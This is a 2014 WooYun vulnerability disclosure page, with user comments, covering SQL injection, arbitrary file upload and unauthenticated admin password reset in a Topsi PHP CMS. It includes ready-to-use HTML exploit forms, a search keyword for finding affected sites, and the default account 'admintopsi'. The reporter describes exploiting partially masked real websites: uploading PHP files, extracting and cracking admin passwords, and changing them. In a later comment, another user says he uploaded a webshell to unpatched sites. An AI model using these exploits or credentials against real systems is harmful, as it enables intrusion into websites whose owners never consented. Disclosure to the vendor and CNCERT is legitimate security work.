当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062071

漏洞标题:某建站公司开发的CMS存在通用SQL注射、任意文件上传、管理员密码修改漏洞

相关厂商:某网络科技有限公司

漏洞作者: U神

提交时间:2014-05-25 11:27

修复时间:2014-08-23 11:28

公开时间:2014-08-23 11:28

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-25: 细节已通知厂商并且等待厂商处理中
2014-05-30: 厂商已经确认,细节仅向厂商公开
2014-06-02: 细节向第三方安全合作伙伴开放
2014-07-24: 细节向核心白帽子及相关领域专家公开
2014-08-03: 细节向普通白帽子公开
2014-08-13: 细节向实习白帽子公开
2014-08-23: 细节向公众公开

简要描述:

@疯狗,这个危害大啊~多个漏洞打包了,求来个首页,今晚请你吃饭!

详细说明:

#1.通用漏洞的详细描述

1、建站程序类型:PHP+Mysql
2、漏洞类型:大量SQL注入、任意文件上传、管理员密码修改
3、缺陷文件:
注入:news_show.php 等大量
上传漏洞:admin_topsi/addpic.php?action=upload
管理员密码修改:admin_topsi/modifypwd.php
4、注入参数:id、tid等等
5.涉及版本:全版本
7、危害程度:高危
8、涉及厂商:苏州托普斯网络科技有限公司
9、厂商网站:http://www.topsi.net.cn/
10、安装量:大
11、是否拥有源代码分析:暂无
12、关键字:"技术支持:苏州托普斯网络" 厂商案例:http://www.topsi.net.cn/case.php
13、是否默认配置:是
14、枚举案例【应乌云的要求,枚举5例】:
【声明:以下提供的全部案例一方面证明通用型,一方面是给CNVD或Cncert测试,其他人不得用此作非法用途或者破坏操作,否则后果自负】
http://www.h***o.co/
http://www.c***n.com
http://www.s***ng.com
http://www.k***.gov.cn
http://hefeng.***61.com
http://www.m***ie.com.cn
.....等等


#2.关键字的搜索量、厂商主页的案例列表:

01.jpg







04.jpg


漏洞证明:

#3.SQL注入漏洞的实例证明(乌云要求枚举5枚):

http://www.***.com/product_show.php?id=31
05.jpg




http://www.***.com/news_show.php?id=36&tid=2&cid=2



06.jpg




http://www.s***ao.com/news_show.php?id=29



07.jpg




http://www.k***f.net/new_show.php?id=61



08.jpg




http://www.s***.com/news_show.php?id=48



09.jpg


************************************************************************************************
#4.任意文件上传证明【admin_topsi/addpic.php】:
首先要知道默认后台是:admin_topsi/login.php
默认后台页面样式:

11.jpg


详细说明:后台的文件上传页面【admin_topsi/addpic.php】
虽然限制了访问该页面,但是通过测试,本地构造上传表单直接post到这个地址,NC提交post数据包或者开启抓包工具就可以得到上传的文件。
EXP:

<form enctype="multipart/form-data" method="post" action="http://xxxx.com/admin_topsi/addpic.php?action=upload">
<input name="mypic" type="File" size="35">
<input type="Submit" name="Submit" value="upload">
</form>


然后提交之后抓包,获得上传文件,统一存储在【upload】目录下:

12.jpg


http://www.s***ic.comhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/1400849095.php


13.jpg


继续枚举案例:

14.jpg


http://www.k***china.comhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/1400849551.php


15.jpg


再继续枚举案例:

16.jpg


http://www.c***ter.comhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/1400849984.php


19.jpg


最后再努力举例一枚:

17.jpg


http://www.***ck.comhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/1400850100.php


18.jpg


************************************************************************************************
#5.管理员密码修改证明【admin_topsi/modifypwd.php】
首先说明一下,这套CMS存在通用帐号:“admintopsi”,跟上面原理一样,直接提交就可以了,虽然会跳转到登录框,但是无视它直接用新密码登录会发现成功登录,下面构造EXP:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=GBK">
<title>ModifyAdminpwd</title>
</head>
<body>
<form method="post" action="http://www.xxxx.com/admin_topsi/modifypwd.php" name="form1">
     用 户 名:<b>admintopsi</b>
	  <br>
      新 密 码:
      <input name="password" type="password" id="password">
	  <br>
     确认密码:
      <input name="pwdconfirm" type="password" id="pwdconfirm"> 
	  <br>
      <input class="luweiinput" type="submit" name="Submit" value=" 确 定 ">
	  <input class="luweiinput" name="Cancel" type="button" id="Cancel" value=" 取 消 ">
</form>


大神一眼看出这个EXP有问题吧,我也暂时没有分析出用户名是怎么接收的?源码没权限拿到啊~所以这里只能改默认帐号“admintopsi”,但是绝大多存在该默认帐号~
实战测试:

http://www.k***n.com/


根据注入发现这个网站存在默认帐号:admintopsi
然后直接上EXP去修改,修改成功~

20.jpg


再来一例~(仔细看,虽然会跳转到登录框)

http://www.s***z.com


21.jpg


22.jpg


最后再演示一例:

http://www.s***bao.com


23.jpg


PS:有人会说,你这肯定是登录后台留下了缓存或cookie导致可以修改密码的,首先我要这样说,测试这个漏洞的时候我并没有去尝试登录后台,而是先通过注入得到帐号密码,然后将密码解密,这里解密是因为我既然改了别人密码肯定要改回去是吧,不然别人很着急的,所以我先记下原密码,然后我连后台都没登录过,然后通过上面给出的EXP,直接将密码修改成123456或其它密码,结果发现确实是可以登录的,也就是说无需进入后台就可以修改密码。我所奇怪之处就是不知道这个用户名是如何接收的,测试了一下用增加一个input里面的id改为username、name都无效,通过抓包也没分析出来~而且这些网站真奇怪!

修复方案:

PS:希望cncert在测试修改密码这个漏洞的时候先通过注射将原密码注射出来解密后,记住原密码,然后再尝试测试修改密码这个漏洞!以免给他人带来不必要的麻烦,谢谢合作~
【以上均为安全测试,漏洞报告,其他人请勿用于非法用途或破坏,否则后果自负】

版权声明:转载请注明来源 U神@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-05-30 09:49

厂商回复:

CNVD确认并复现所述情况,由CNVD通过公开联系渠道向软件生产厂商通报处置。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-05-25 12:07 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    三合一啊,今晚可以到警局来吃饭

  2. 2014-05-25 12:31 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @疯狗 我擦!你这样打出厂商名字来不就谁都知道详情了?

  3. 2014-05-25 12:48 | Azui ( 路人 | Rank:25 漏洞数:10 | 用一只黑色铅笔画一出舞台默剧。)

    @U神 +1 这样子基本上都知道了。

  4. 2014-05-26 11:27 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @U神 - - !

  5. 2014-05-26 11:47 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @U神 @疯狗 吃饭了?

  6. 2014-08-24 22:05 | answer ( 普通白帽子 | Rank:347 漏洞数:45 | 答案)

    目测 任意上传用不了呢 。。我传了过后 跳出的是404。。。。。X

  7. 2014-08-24 22:57 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @answer 厂商已经修复了漏洞

  8. 2014-08-24 23:39 | answer ( 普通白帽子 | Rank:347 漏洞数:45 | 答案)

    @U神 霍霍 虽然修了 但还是找到有漏网之鱼,,但不知道为什么传上去的马儿访问的时候有错误。。不知道怎么回事 。。